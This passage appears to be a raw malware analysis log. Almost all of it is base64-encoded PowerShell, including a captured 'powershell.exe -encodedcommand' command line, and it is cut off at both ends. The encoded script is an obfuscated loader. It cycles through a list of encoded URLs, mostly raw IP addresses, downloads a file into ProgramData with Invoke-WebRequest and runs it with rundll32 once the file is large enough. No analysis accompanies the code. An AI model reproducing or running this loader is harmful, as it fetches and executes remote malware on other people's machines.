A9AHIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAYgB3AEIAdABBAEcAOABBAFoAUQBCAHkAQQBHADgAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAeQBBAEcAVQBBAGQAZwBCAHAAQQBHAFUAQQBkAHcAQQA9ACIAOwAkAGEAcABvAHMAdAByAG8AcABoAGkAegBlAGQAQwBvAG0AcABsAGUAeABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEgASQBBAGIAdwBCAHcAQQBIAEkAQQBhAFEAQgBsAEEASABRAEEAWQBRAEIAeQBBAEcAawBBAFoAUQBCAHoAQQBGAE0AQQBjAFEAQgAxAEEARwBFAEEAYgBRAEIAbABBAEcAdwBBAGIAQQBCAGgAQQBIAFEAQQBaAFEAQQB1AEEARwBjAEEAYgB3AEIAcwBBAEcAWQBBAEIATgBVAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBRAEEAdQBBAEQARQBBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABFAEEATABnAEEAeABBAEQARQBBAE4AZwBBAD0AIgA7ACQAcABlAHIAagB1AHIAZQBkAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATwBBAEEAMABBAEMANABBAE0AUQBBADMAQQBEAEEAQQAiADsAJABUAG8AbwBtAGwAeQBNAGUAYwBoAGEAbgBvAHIAZQBjAGUAcAB0AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGIAdwBCAHQAQQBHAGsAQQBkAEEAQgBoAEEARwBRAEEAYQBnAEIAcABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAMABBAEgAVQBBAGMAZwBCAGgAQQBHAHcAQQBMAGcAQgBoAEEARwBNAEEAWQBRAEIAawBBAEcAVQBBAGIAUQBCADUAQQBBAD0APQB2AG0AYwBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQB4AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBPAEEAQQB1AEEARABVAEEATgBRAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBOAHcAQQA0AEEAQQA9AD0AdgBtAGMATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBRAEIAWABBAEcAOABBAGMAZwBCAGsAQQBHAEkAQQBkAFEAQgBwAEEARwB3AEEAWgBBAEIAcABBAEcANABBAFoAdwBBAHUAQQBIAEkAQQBkAFEAQgBvAEEASABJAEEAIgA7ACQAdAByAGkAYwBrAGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATgBnAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA0AEEARABVAEEATABnAEEAMwBBAEQASQBBAEwAdwBCAHoAQQBEAEUAQQBlAEEAQgB1AEEAQwA4AEEAWgBnAEEAegBBAEUAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQAawBBAE8AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATgBBAEEANABBAEMAOABBAGIAZwBCAEkAQQBDADgAQQBSAFEAQgBRAEEAQQA9AD0AdQBKAGkAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAHAAQQBGAG8AQQBkAHcAQgBVAEEARQBZAEEAYwBBAEIAVwBBAEgAQQBBAFIAdwBBAHkAQQBEAEEAQQBWAEEAQQA9AHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEgAawBBAGEAQQBCAHgAQQBGAGMAQQBOAHcAQgBqAEEARQBZAEEAUQBRAEIASABBAEQAawBBAHUASgBpAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATgBnAEEANABBAEMAOABBAE8AUQBCAEQAQQBHADAAQQBPAFEAQgBGAEEARgBjAEEATAB3AEIARgBBAEcAdwBBAFEAdwBCAHMAQQBHAHcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQAgAGkAbgAgACQAdAByAGkAYwBrAGwAZQBkACAALQBzAHAAbABpAHQAIAAiAHUASgBpAGEAIgApACAAewAkAGMAbwBwAGgAbwB1AHMAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAHQAQQBHADgAQQBjAGcAQgBrAEEARQA0AEEAYgB3AEIAdQBBAEcAVQBBAGUAQQBCADAAQQBHAFUAQQBjAGcAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQBEAHEAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBZAFEAQgBrAEEARwB3AEEAYQBRAEIAbgBBAEcAZwBBAGQAQQBCAEMAQQBIAFUAQQBiAEEAQgBzAEEARwBnAEEAWgBRAEIAaABBAEcAUQBBAFoAUQBCAGsAQQBHAHcAQQBlAFEAQQB1AEEASABJAEEAWgBRAEIAawBBAEEAPQA9AEQAcQBYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAZwBBAGMAZwBCAHYAQQBHADAAQQBZAFEAQgAwAEEARwA4AEEAYwBBAEIAbwBBAEcAOABBAGMAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEASABZAEEAWgBRAEIAdQBBAEgAUQBBAGQAUQBCAHkAQQBHAFUAQQBjAHcAQQA9ACIAOwAkAG4AbwBuAGMAbwBuAHYAZQByAHQAaQBiAGwAZQBuAGUAcwBzAEYAaQBkAGkAYwBpAG4AYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEARwA4AEEAYQBRAEIAcwBBAEcAVQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEARgBBAEEAYwBnAEIAbABBAEcATQBBAFkAUQBCAHUAQQBHAE0AQQBaAFEAQgB5AEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEEAPQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AQQBBADEAQQBDADQAQQBOAHcAQQAyAEEAQwA0AEEATgB3AEEAMQBBAEMANABBAE8AQQBBAHcAQQBBAD0APQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE0AQQBBAHUAQQBEAEUAQQBNAGcAQQAxAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBADIAQQBEAE0AQQAiADsAJAB1AG4AbQBlAGEAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEgATQBBAGEAUQBCAGgAQQBHADQAQQBhAFEAQgBqAEEARQBnAEEAYgB3AEIAdgBBAEgASQBBAFkAUQBCAG8AQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAWgBBAEIAcABBAEgASQBBAFoAUQBCAGoAQQBIAFEAQQBiAHcAQgB5AEEASABrAEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGoAQQBIAFUAQQBjAGcAQgBqAEEASABVAEEAYgBBAEIAcABBAEcAOABBAGMAdwBCAEIAQQBHAGMAQQBZAFEAQgB5AEEARwBrAEEAWQB3AEEAdQBBAEcAcwBBAGEAUQBCADAAQQBHAE0AQQBhAEEAQgBsAEEARwA0AEEAZwB3AGkAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFUAQQBZAHcAQgBqAEEARwB3AEEAWgBRAEIAegBBAEcAawBBAGIAdwBCAHMAQQBHADgAQQBaAHcAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMANABBAGIAUQBCADQAQQBBAD0APQBnAHcAaQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGEAUQBCAHMAQQBHAEUAQQBhAHcAQgBoAEEAQwA0AEEAYgBRAEIAbABBAEcANABBACIAOwB0AHIAeQAgAHsAJABTAHQAZQBtAHMAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAZQBRAEIAbABBAEcAdwBBAGEAUQBCAHUAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAMABBAEcAawBBAFkAdwBCAFYAQQBHADQAQQBZAFEAQgBuAEEASABJAEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBDADQAQQBZAGcAQgBsAEEASABRAEEAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAeQBBAEMANABBAE0AUQBBAHcAQQBEAGsAQQBMAGcAQQB4AEEARABJAEEATgB3AEEAPQBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEgASQBBAGQAUQBCAGsAQQBHAGMAQQBhAFEAQgB1AEEARwBjAEEAVgBRAEIAdQBBAEcAVQBBAGIAZwBCADEAQQBHADAAQQBaAFEAQgB5AEEARwBFAEEAZABBAEIAcABBAEgAWQBBAFoAUQBBAHUAQQBHAG8AQQBjAEEAQQA9AHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBZAEEAYQBRAEIAaABBAEcAUQBBAGQAUQBCAGoAQQBIAFEAQQBjAHcAQQB1AEEASABRAEEAYgB3AEIAMQBBAEgASQBBAGMAdwBBAD0AIgA7ACQAVAB1AHIAdABvAHMAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGIAdwBCADAAQQBHAGcAQQBaAFEAQgB2AEEASABJAEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGoAQQBHADgAQQBTAGgARgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYgBBAEIAbABBAEUATQBBAGIAdwBCAGgAQQBHAFEAQQBhAGcAQgAxAEEASABRAEEAWQBRAEIAdQBBAEgAUQBBAEwAZwBCAGkAQQBHAEUAQQBjAGcAQgBuAEEARwBFAEEAYQBRAEIAdQBBAEgATQBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATgB3AEEAdQBBAEQAYwBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMQBBAEQAYwBBAFMAaABGAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYQBRAEIAeQBBAEcANABBAFkAUQBCAHMAQQBGAGMAQQBhAFEAQgB5AEEARwBVAEEAYQBBAEIAaABBAEcAawBBAGMAZwBBAHUAQQBIAFUAQQBhAHcAQQA9ACIAOwAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABuAG8AbgBlAHgAdABlAG4AcwBpAHYAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBhAHQAdAByAGEAYwB0AGkAdgBlAFUAbgBhAHAAcAByAGUAYwBpAGEAdABpAHYAZQAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAHAAaQB0AHQAbABlAHMAdABhAGYAZgBIAHkAcABlAHIAcwB1AGIAdABsAGUALgBoAGUAeABhAG0AZQByAG8AdQBzAEkAZABpAG8AdABpAHMAZQA7ACQASABlAG4AbQBvAGwAZAB5AE0AdQBnAGcAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAdwBCADUAQQBHAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEgAUQBBAGMAZwBCADUAQQBFAFUAQQBZAGcAQgBqAEEARwBFAEEAYwB3AEIAagBBAEMANABBAGQAZwBCAGoAQQBBAD0APQA9AEsASQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAGsAQQBMAGcAQQAyAEEARABNAEEATABnAEEANQBBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAEEAQQA9ACIAOwAkAGgAbwBvAGQAdwBpAG4AawBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAE0AQQBMAGcAQQB4AEEARABNAEEATQBRAEEAPQBFAHoAVwB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBRAEEAMwBBAEQARQBBAEwAZwBBADUAQQBEAEkAQQAiADsAJABCAGEAegBhAGEAcgBOAG8AbgBlAHgAYQBnAGcAZQByAGEAdABpAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcANABBAGIAdwBCAHUAQQBIAEkAQQBZAFEAQgBrAEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBHADAAQQBaAFEAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQA0AEEARABFAEEATABnAEEAeQBBAEQAUQBBAE0AZwBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAGkAdAB0AGwAZQBzAHQAYQBmAGYASAB5AHAAZQByAHMAdQBiAHQAbABlAC4AaABlAHgAYQBtAGUAcgBvAHUAcwBJAGQAaQBvAHQAaQBzAGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADYAMgA3ADAAOQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEgATQBBAGMAQQBCAHAAQQBIAFEAQQBkAEEAQgBzAEEARwBVAEEAYwB3AEIAMABBAEcARQBBAFoAZwBCAG0AQQBFAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAegBBAEgAVQBBAFkAZwBCADAAQQBHAHcAQQBaAFEAQQB1AEEARwBnAEEAWgBRAEIANABBAEcARQBBAGIAUQBCAGwAQQBIAEkAQQBiAHcAQgAxAEEASABNAEEAUwBRAEIAawBBAEcAawBBAGIAdwBCADAAQQBHAGsAQQBjAHcAQgBsAEEAQwB3AEEAZABnAEIAcABBAEgAQQBBAGMAdwBBADcAQQBFADAAQQBTAFEAQgBVAEEARQB3AEEAYQBRAEIAagBBAEcAVQBBAGIAZwBCAHoAQQBHAFUAQQAiADsAJABDAG8AbQBiAGUAcgBzAFcAYQByAGQAZQBuAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcARQBBAGQAQQBCAGwAQQBIAGMAQQBZAFEAQgA1AEEARwAwAEEAWQBRAEIAdQBBAEUAUQBBAFoAUQBCAGgAQQBHAFkAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEgAUQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQA9AGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBzAEEAWgBRAEIAMABBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBSAFEAQgB0AEEARwA4AEEAWgBBAEIAcABBAEcANABBAGMAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBnAEEAIgA7ACQAYwBhAHIAYQBiAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcAawBBAGIAUQBCAGgAQQBHADQAQQBkAEEAQgB2AEEASABBAEEAZABRAEIAegBBAEYAUQBBAGIAdwBCAHkAQQBIAEkAQQBaAFEAQgBtAEEASABrAEEATABnAEIAdABBAEcAOABBAFoAQQBCAGgAQQBBAD0APQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFcAQQBHAGsAQQBjAHcAQgBqAEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCADAAQQBHADgAQQBjAGcAQQB1AEEARwA0AEEAWQBRAEIAMgBBAEgAawBBAHgAaABLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBAHgAQQBEAEEAQQBPAEEAQQB1AEEARABFAEEATwBRAEEAdwBBAEMANABBAE0AZwBBAHgAQQBEAFEAQQB4AGgASwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBlAFEAQgB3AEEARwBVAEEAYwBnAEIAdwBBAEgASQBBAGIAdwBCAHcAQQBHAGcAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEcAMABBAFkAUQBCAHUAQQBHAEUAQQBaAHcAQgBsAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBACIAOwAkAFMAeQBuAGEAbgBnAGkAYQBsAEMAbwByAGIAZQBsAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGsAQQBNAFEAQQB1AEEARABnAEEATQBnAEEAdQBBAEQASQBBAE0AZwBBADEAQQBBAD0APQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFkAQQBaAFEAQgB5AEEARwBJAEEAWQBRAEIAcwBBAEcAawBBAGMAdwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAUwBBAEIAbABBAEgASQBBAFoAQQBCAGwAQQBIAEkAQQBjAHcAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAawBBAGQAQQBCAGwAQQBHAFEAQQBLAEQAYQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBsAEEARwA0AEEAZABRAEIAdABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgBrAEEAQwA0AEEAYQB3AEIAcABBAEgAUQBBAFkAdwBCAG8AQQBHAFUAQQBiAGcAQQA9AEsARABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBRAEEAeABBAEQARQBBAEwAZwBBADAAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAEwAdQBuAGMAaABlAG8AbgBlAHQAdABlAHMATQBlAG4AdABoAGEAYwBlAGEAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAUQBBAGMAZwBCADEAQQBHAFEAQQBaAHcAQgBwAEEARwA0AEEAWgB3AEIAVgBBAEcANABBAFoAUQBCAHUAQQBIAFUAQQBiAFEAQgBsAEEASABJAEEAWQBRAEIAMABBAEcAawBBAGQAZwBCAGwAQQBDADQAQQBjAGcAQgB2AEEARwBNAEEAYQB3AEIAegBBAEEAPQA9ACIAOwAkAGgAZQBuAGMAaABtAGUAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQA9AEYAVwBNAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADUAQQBDADQAQQBNAGcAQQB4AEEARABVAEEATABnAEEAeQBBAEQAUQBBAE8AUQBBAD0ARgBXAE0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEIAQQBIAE0AQQBkAHcAQgBoAEEARwBrAEEAYgBBAEIAVABBAEgAVQBBAFkAZwBCAGgAQQBIAFUAQQBaAEEAQQB1AEEARwB3AEEAYQBRAEIAdABBAEcAOABBACIAOwB9AH0AJABpAGcAbgBhAHQAaQB1AHMARgBsAHUAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBPAFEAQQB1AEEARABnAEEATgB3AEEAdQBBAEQARQBBAE4AUQBBADQAQQBDADQAQQBPAEEAQQA1AEEAQQA9AD0AdwBDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcATQBBAGMAZwBCAHYAQQBHAEkAQQBhAFEAQgB6AEEAQwA0AEEAYgBRAEIAaQBBAEcARQBBACIAOwA="

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABwAGEAbABtAGUAbABsAG8AaQBkAFMAZQBuAHMAYQB0AGkAbwBuAGkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAawBBAGIAZwBCAGwAQQBIAGcAQQBiAHcAQgB5AEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBKAEEASABNAEEAYgB3AEIAeABBAEgAVQBBAGEAUQBCAHUAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQB3AEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQBKAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAaQBBAEgASQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQgBUAEEARwA0AEEAYgB3AEIAaQBBAEcASQBBAGEAUQBCAHoAQQBHAGcAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAdQBBAEcATQBBAFkAUQBCAHQAQQBHAFUAQQBjAGcAQgBoAEEAQQA9AD0ASgBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE8AQQBBAHUAQQBEAEkAQQBNAGcAQQB5AEEAQwA0AEEATgBRAEEAdwBBAEMANABBAE0AUQBBADAAQQBEAFUAQQAiADsAJABsAGkAcQB1AGUAZgBpAGUAcwBVAG4AdwBhAGQAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgB3AEEAegBBAEMANABBAE0AUQBBAHgAQQBEAGcAQQBMAGcAQQA0AEEARABRAEEAVgBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBBAEEAdQBBAEQARQBBAE4AdwBBADAAQQBDADQAQQBOAHcAQQA0AEEAQwA0AEEATgB3AEEANQBBAEEAPQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAFoAUQBCADAAQQBIAFEAQQBhAFEAQgB0AEEARwBFAEEATABnAEIAagBBAEcARQBBAGMAdwBCAHAAQQBHADQAQQBiAHcAQQA9AFYATAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAFEAQQBNAEEAQQB1AEEARABJAEEATQB3AEEAdwBBAEMANABBAE0AUQBBADEAQQBEAGsAQQAiADsAJABzAHQAbwBjAGsAbQBhAGsAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBJAEEAYgB3AEIAeQBBAEcAYwBBAGEAQQBCAHAAQQBGAEkAQQBaAFEAQgBqAEEARwA4AEEAYgBnAEIAbQBBAEcAawBBAGMAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGoAQQBHADgAQQBiAGcAQgB6AEEASABVAEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAG4AQQBHADgAQQBiAEEAQgBrAEEAQQA9AD0AcgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEARwBVAEEAZABBAEIAeQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBlAFEAQgBGAEEASABnAEEAZABBAEIAeQBBAEgAVQBBAGMAdwBCAHAAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWgBRAEIAdQBBAEgAUQBBAFoAUQBCAHkAQQBIAEEAQQBjAGcAQgBwAEEASABNAEEAWgBRAEIAegBBAEEAPQA9AHIAYQBBAEIAMABBAE